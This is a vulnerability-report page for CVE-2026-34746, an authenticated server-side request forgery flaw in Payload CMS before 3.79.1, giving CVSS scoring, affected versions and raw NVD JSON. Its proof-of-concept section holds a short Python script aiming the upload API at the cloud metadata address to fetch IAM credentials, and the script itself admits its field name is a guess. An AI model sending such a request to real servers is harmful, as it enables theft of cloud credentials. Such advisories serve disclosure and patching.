Security Vulnerability Report
中文
CVE-2026-34746 CVSS 7.7 HIGH

CVE-2026-34746

Published: 2026-04-01 20:16:27
Last Modified: 2026-04-13 18:52:39
Source: [email protected]

Description

Payload is a free and open source headless content management system. Prior to version 3.79.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the upload functionality. Authenticated users with create or update access to an upload-enabled collection could cause the server to make outbound HTTP requests to arbitrary URLs. This issue has been patched in version 3.79.1.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:* - VULNERABLE
Payload CMS < 3.79.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the Payload CMS instance target_url = "http://target-cms.com/api/uploads" # Malicious URL (e.g., internal metadata service) ssrf_payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Authentication token (Required as per PR:L) headers = { "Authorization": "Bearer <VALID_JWT_TOKEN>", "Content-Type": "application/json" } # Payload data structure triggering the SSRF # The specific field 'url' depends on the actual API implementation for uploads data = { "file": "exploit.jpg", "url": ssrf_payload } # Send the malicious request response = requests.post(target_url, json=data, headers=headers) if response.status_code == 200: print("[+] SSRF request sent successfully.") else: print("[-] Failed to send request.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34746", "sourceIdentifier": "[email protected]", "published": "2026-04-01T20:16:26.727", "lastModified": "2026-04-13T18:52:39.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Payload is a free and open source headless content management system. Prior to version 3.79.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the upload functionality. Authenticated users with create or update access to an upload-enabled collection could cause the server to make outbound HTTP requests to arbitrary URLs. This issue has been patched in version 3.79.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.79.1", "matchCriteriaId": "B4AE65F8-450D-4573-9CD7-1AA42CE5DC28"}]}]}], "references": [{"url": "https://github.com/payloadcms/payload/releases/tag/v3.79.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/payloadcms/payload/security/advisories/GHSA-6r7f-q7f5-wpx8", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.